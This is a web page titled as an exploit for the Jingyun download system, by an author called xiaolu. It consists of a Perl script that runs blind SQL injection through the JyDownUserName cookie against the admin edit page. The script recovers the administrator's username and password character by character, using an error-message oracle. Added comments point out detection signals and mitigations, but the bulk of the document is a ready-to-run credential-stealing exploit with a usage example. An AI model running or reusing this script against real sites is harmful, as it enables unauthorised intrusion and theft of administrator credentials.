
惊云下载系统漏洞利用Exploits

惊云下载系统漏洞利用Exploits

文章作者:小路
#!/usr/bin/perl
#The script cracks admin via SQL 注入
#Code by xiaolu


use IO::Socket;

# Command-line handling: the script expects three positional arguments
# (host, URL path, port).  Everything here is a package global because the
# file never enables `use strict; use warnings;`, so a mistyped variable
# name anywhere below would silently create a new global.
$ARGC = @ARGV;
if ($ARGC < 3)
{
print "\n\n";
print "\t* The script write by Xiaolu *\n\n";
# Usage line ("例子" = "example").
print "例子: jy.pl 666w.com /down/admin/edit.asp 80\n";
exit;
}

# `@ARGV[0]` is a one-element array slice rather than `$ARGV[0]`; in scalar
# assignment the slice yields its single element, so it works, but
# `perl -w` would warn about it.
$host = @ARGV[0];
$way = @ARGV[1];
$port = @ARGV[2];
# The boolean oracle: every probe below is considered "true" when the HTTP
# response body contains this application error text ("原密码错误" =
# "original password is wrong").  From a defender's view this is the whole
# weakness that makes blind injection observable — the page's error text
# differs depending on the outcome of an injected WHERE clause.  Returning a
# uniform error response (and, more fundamentally, parameterising the query)
# removes the signal.
$errinfo="原密码错误";
# "Starting the test against $host, please wait..."
print "\n\n开始在 $host 上进行测试,请等待......\n";

# Phase 1: determine the length of the `user` column, trying 1..20.  Each
# iteration builds one injected value in $way1, which sub url (defined
# below) places in the JyDownUserName cookie, and sub connect sends it and
# returns the raw response lines.  A match on $errinfo ends the loop.
# Detection note: the literal `%09union%09select` sequence (tab-separated
# UNION SELECT, URL-encoded) inside a Cookie header is a high-signal
# indicator for a WAF rule or access-log search, as is a burst of near-
# identical requests that differ only in one numeric cookie fragment.
for ($userlen=1;$userlen<=20;$userlen++)
{
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(user)%3D$userlen%09and%09&#39;1%3D1";
# `&url;` / `&connect` use the ampersand call form, which also hands the
# caller's current @_ to the sub; neither sub reads @_, so it is only a
# style issue here.  `&connect` is additionally needed because a bare
# `connect(...)` would resolve to Perl's built-in of the same name.
&url;@res = &connect;
#print "\n @res \n";
# "@res" joins all response lines with spaces before the regex test.
if ("@res" =~ /$errinfo/)
{
# "user length found: N characters"
print "* 发现user长度为: $userlen 位\n";
last;
}
}

# Phase 2: same length probe as above, for the `pwd` column.  The payload is
# identical except for `len(pwd)`, so the same log/WAF indicators apply.
for ($pwdlen=1;$pwdlen<=20;$pwdlen++)
{
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(pwd)%3D$pwdlen%09and%09&#39;1%3D1";
&url;@res = &connect;
#print "\n @res \n";
if ("@res" =~ /$errinfo/)
{
# "pwd length found: N characters"
print "* 发现pwd长度为: $pwdlen 位\n";
last;
}
}

# Candidate alphabets for the character-by-character phases below.
@dig=(0..9);
# `a..z` / `A..Z` are barewords (allowed only because strict is off); the
# range operator treats them as the strings 'a' and 'z', giving the letters.
@char=(a..z);
@dchar=(A..Z);
# Punctuation list; `%25` is a URL-encoded percent sign because the value
# is later interpolated into a cookie.  qw() does not process backslash
# escapes, so entries such as `\(` are kept verbatim — presumably intended
# as regex-safe forms; TODO confirm how they are meant to reach the server.
@tchar=qw(` ~ ! + @ # $ %25 ^ & * \( \) _ = - { } [ ] :  ; < > ? | , . / \\);
# @dic (for user) omits uppercase letters; @dic1 (for pwd) includes them.
@dic=(@char,@dig,@tchar);
@dic1=(@dig,@char,@tchar,@dchar);

# Phase 3: recover `user` one character position at a time.  For position
# $userlocat every candidate in @dic is appended to the confirmed prefix
# $userdic and tested with `left(user, N) = prefix.candidate`.  The number
# of requests is therefore up to (alphabet size) per position — a
# volumetric pattern that is easy to spot in access logs when each request
# carries the same session cookie.
# "Starting to retrieve user, please wait..."
print "\n开始尝试获取user,请等待......\n";
for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic)
{   
# $userdic is never initialised explicitly; it starts as undef and is
# set only when a position is confirmed below.
$user=$userdic.$usertemp;
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(user,$userlocat)%3D&#39;$user&#39;%09and%09&#39;1%3D1";
#print "$usertemp ";
&url;@res = &connect;
if ("@res" =~ /$errinfo/)
{
# Candidate confirmed: extend the prefix and move to the next position.
$userdic=$user;
# "user retrieved successfully: ..." (final position)
if ($userlocat==$userlen){print "\n\n* user获取成功!!! : $user \n";last;}
# "user has N characters; the first M are ..."
print "* user共 $userlen 位,前 $userlocat 位为 $user \n";
last;
}
}
}
# Phase 4: same position-by-position recovery as for `user`, applied to the
# `pwd` column with the larger alphabet @dic1.  The `pwd` column being
# comparable with `left()` implies it is stored in a reversible or plain
# form; storing password hashes rather than passwords is the mitigation
# that limits what any such extraction can yield — inferred from the
# payload shape, not confirmed by the page.
# "Starting to retrieve pwd, please wait..."
print "\n开始尝试获取pwd,请等待......\n";
for ($pwdlocat=1;$pwdlocat<=$pwdlen;$pwdlocat++)
{
foreach $pwdtemp(@dic1)
{   
# $pwddic accumulates the confirmed prefix, like $userdic above.
$pwd=$pwddic.$pwdtemp;
$way1 = "wocaonima&#39;%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09left(pwd,$pwdlocat)%3D&#39;$pwd&#39;%09and%09&#39;1%3D1";
#print "$pwdtemp ";
&url;@res = &connect;
if ("@res" =~ /$errinfo/)
{
$pwddic=$pwd;
# "pwd retrieved successfully: ..." (final position)
if ($pwdlocat==$pwdlen){print "\n\n* pwd获取成功!!! : $pwd \n";last;}
# "pwd has N characters; the first M are ..."
print "* pwd共 $pwdlen 位,前 $pwdlocat 位为 $pwd \n";
last;
}
}
}

# Build the raw HTTP/1.1 POST request into the global $req.  Takes no
# arguments and has no meaningful return value; it reads the globals $way,
# $host and $way1 and exists purely for its side effect on $req.
# The injected value travels in the `JyDownUserName` cookie, i.e. the
# vulnerable application reads a cookie straight into a SQL statement.
# Defender takeaway: cookies are attacker-controlled input exactly like
# query parameters and must be parameterised/escaped the same way.
sub url
{
$req = "POST $way HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n".
"Referer: [url]http://$host$way[/url]\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n".
"Host: $host\r\n".
# The form body below is a fixed literal, so a constant Content-Length is
# used rather than computing length() of the body.
"Content-Length: 164\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
# A hard-coded ASP session id and `JyDownUserDj=3` (presumably a privilege
# level — TODO confirm against the application) are sent with every
# request.  One session issuing hundreds of requests whose only variation
# is inside a cookie value is itself a strong anomaly for session-level
# rate limiting or log review.
"Cookie: ASPSESSIONIDCQDSRBCC=PNKEJFPDCHNPPHOCJICEPCHP; JyDownUserDj=3; JyDownUserName=$way1\r\n".
"\r\n".
"type=save&pwd=1&pwd1=&pwd2=&sex=%C4%D0&face=&oicq=&email=&homepage=&qm=%BB%B6%D3%AD%C4%E3%C0%B4%B5%BD%BB%AA%CC%DA%C1%AA%BA%CF.&softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4\r\n\r\n";
}


# Open a TCP connection to $host:$port, send the prepared $req, and return
# the complete response as a list of lines.  Takes no arguments; reads the
# globals $host, $port and $req.  Dies if the connection cannot be
# established.  The name shadows Perl's built-in `connect`, which is why
# every call site uses the `&connect` form.
sub connect {
# The `||` binds to the parenthesised `new(...)` call result, so the `die`
# fires correctly on a failed connect (the usual `||`-precedence trap does
# not apply here).
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                      PeerAddr =>$host,
                      PeerPort =>$port) || die "Sorry! Could not connect to $host \n";

# Send the raw request, then read every line until the socket reaches EOF.
# Reading to EOF despite the `Connection: Keep-Alive` header presumably
# relies on the server closing the connection — TODO confirm.
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
